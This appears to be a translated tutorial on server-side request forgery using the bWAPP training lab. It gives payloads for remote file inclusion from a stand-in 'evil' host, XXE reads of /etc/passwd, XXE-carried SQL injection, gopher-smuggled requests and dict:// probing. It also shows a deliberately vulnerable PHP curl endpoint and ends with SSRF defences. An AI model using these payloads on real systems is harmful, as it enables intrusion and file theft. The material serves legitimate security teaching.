SSRF server-side request forgery loophole-offensive and defensive combat and prevention methods

Offensive and defensive combat and prevention methods

SSRF in bWAPP gives 3 small experiments to illustrate the use scenarios of SSRF

Task 1: Use remote file inclusion for port scanning (intranet detection)

Click Port Scan in Task 1 to get a port scan attack script. You
only need to include the script and request the IP parameter as the corresponding host. The next step is to use the remote file inclusion vulnerability in bWAPP to perform the port scan script
Choose. In your bug, choose Remote & Local File Inclusion (RFI / LFI) security level or select low, and then click Hack to
enter the Remote & Local File Inclusion (RFI / LFI) experiment, and see that there is a function module for selecting the language. Next, observe
the parameters in the Get request and find that the typical file contains problems. Language = lang_en.php
GET request: http://192.168.163.157/bWAPP/rlfi.php?language=lang_en.php&action=go
Use the following PAYLOAD, Remotely include and execute scan scripts to detect ports and services of intranet hosts

POST: http://192.168.163.157/bWAPP/rlfi.php?language=http://xxx.xxx.xxx/evil/ss
rf-1.txt & action = go POST DATA: ip = 192.168.163.159
here xxx.xxx .xxx (192.168.163.1) is the access address scanning scripts, 192.168.163.159 is the target host address to be scanned, and the address is xxx.xxx.xxx host can not have access to, and use post for easy viewing distinguish submit a request
to be Scan the target host IP and return the result after the scan.

Task 2: Use XXE to get the contents of sensitive files (file reading)

First click Access in Task 2 to get the XXE utilization script: http://xxx.xxx.xxx/bWAPP/xxe-1.php, then access the
XML External Entity Attacks (XXE) exercise environment, use burpSuite to capture the package, and send Go to the repeater
for testing
XXE knowledge involved in the test can refer to the article http://mp.weixin.qq.com/s/Yt7s-OoGMilCs-Yvyjl1xA.
Use http protocol to get the content of /bWAPP/robots.txt.

<?xml version="1.0" encoding="utf-8"?> 
 <!DOCTYPE root [ <!ENTITY bWAPP SYSTEM "http://localhost/1/bwapp/robots.txt"> ]>
 <reset>  <login>&bWAPP;
 </login> 
  <secret>blah</secret> 
   </reset>

xml version definition
DTD definition root element element type
read file content
reference content

php: //filter/read=convert.base64-encode/resource=http: //192.168.0.67/1/bwapp/passwords/he
roes.xml
use the php protocol to get the base64 in /bWAPP/passwords/heroes.xml Encoded data

Use the file protocol to get the content of bWAPP native / etc / passwd

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE root [ <!ENTITY bWAPP SYSTEM "file：//etc/passwd"> ]> <reset> 

<login>&bWAPP;</login>  <secret>blah</secret>  </reset>

Applicable to the document contains special symbols, when xml execution will report an error, here use php protocol encoding, bypass

Task 3: Use XXE for intranet sql injection

This task exploits SQL injection vulnerabilities in intranet sites. For example, if there is an injection vulnerability on the 192.168.163.150 host,
you can send the following payload. You can use SSRF to exploit SQL vulnerabilities, and of course you can also use Struts2 and other vulnerabilities
.

1.<?xml version=”1.0″ encoding=”utf-8″?>
2.<!DOCTYPE root [
3. <!ENTITY bWAPP SYSTEM 
"http://192.168.163.150/news.php?newsid=-11+union+select+1,user()">
4.]>
5.<reset><login>&bWAPP;</login><secret>blah</secret></reset>

SSRF Knowledge Development

The above describes the general usage of SSRF. It uses http, file, and php protocols for intranet detection, file reading, and vulnerability utilization. The next discussion is
the expanded knowledge of SSRF . Recall that the above uses are all made by sending GET requests. So please think about if the vulnerability of the internal site is in the parameters of the POST request? Or is the vulnerability in
a field in the request header? How should the SSRF request be constructed for exploitation?

Experimental target machine construction

From the content of the above table, you can know that the use of the gopher protocol in PHP requires curl support. Of course, curl also supports a lot of protocols. First, prepare the
lamp environment. If PHP on ubuntu does not have curl extensions, you need to use the following command. Install
sudo apt-get install php5-curl
sudo service apache restart Then write the following test code, the user-controllable input point is $ _GET ['url']

			1.<?php
2.// 创建一个新 cURL 资源
3.$ch = curl_init();
4.// 设置 URL 和相应的选项
5.curl_setopt($ch, CURLOPT_URL, $_GET['url']);
www.oldboyedu.com
6.curl_setopt($ch, CURLOPT_HEADER, false);
7.// 抓取 URL 并把它传递给浏览器
8.curl_exec($ch);
9.//关闭 cURL 资源，并且释放系统资源
10.curl_close($ch);
11.?>

Use of file protocol

Request http://192.168.163.150/test.php?url=file:///etc/passwd to get information about sensitive files

Use of gopher protocol

In the SSRF exploit, the gopher protocol, which is known as Wanjin oil. The gopher protocol
is a protocol that appeared earlier than the http protocol. It is not commonly used now, but in the SSRF exploit, gopher can be said to be Wanjin, because gopher can be used to send requests in various formats Package, this change can solve the problem that the vulnerability point is not in the GET parameter.
Basic protocol format:
URL:gopher://<host>:<port>/<gopher-path>

You can send a POST request with the following request, and the value of the parameter cmd is balabal. When constructing the gopher request, the carriage return and line feed symbol must be
url encoded twice 250 %% 250a

http://192.168.0.100/ssrf1.php?url=gopher://192.168.0.105:8080/_POST%20/test.php%20HTTP/
1.1%250d%250aHost:%20192.168.0.105:8080%250d%250aUser-Agent:%20curl/7.43.0%250d%2
50aAccept:%20*/*%250d%250aContent-Type:%20application/x-www-form-urlencoded%250d%2
50a%250d%250aid=1

At this time, you can find the access log in the access.log of the 192.168.0.105 host.
Of course, you can also use the network packet analysis tool (burp) to capture the HTTP data in TCP traffic. Because gopher can construct various HTTP request packets, so gopher It plays the role of Wanjin oil in the SSRF vulnerability exploitation. The specific attack method can refer to the following link:
https://blog.chaitin.cn/gopher-attack-surfaces/

dict protocol application

The dict protocol is a dictionary server protocol. It is usually used to allow clients to access more dictionary sources during use. However, if you can use the dict
protocol in SSRF, you can easily obtain information such as the version of the service running on the target server port.
For example, if you request http://192.168.163.150/test.php?url=dict://192.168.163.1:3306/info,
you can obtain the application of mysq-l5.5.55 running on port 3306 of the target host.

	**有关 SSRF 其它扩展知道可参考: http://www.anquan.us/static/drops/web-7550.html**

SSRF protection method

1. Protective measures

(Blacklist)
(1) Filter 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, localhost private address, IPv6 address
(2) Filter file: ///, dict: //, gopher: / /, Ftp: // dangerous schema
(3) Identify the returned content
(4) Intranet service authentication (Memcached, Redis, Elasticsearch and MongoDB)

2. Best protection

(1) Use the address whitelist
(2) Identify the returned content
(3) When you need to use Internet resources (such as the use of network pictures in the post bar) and cannot use the whitelist: first disable CURLOPT_FOLLOWLOCATION; then obtain the target
ip by domain name and filter Internal ip; finally identify whether the returned content is consistent with the assumed content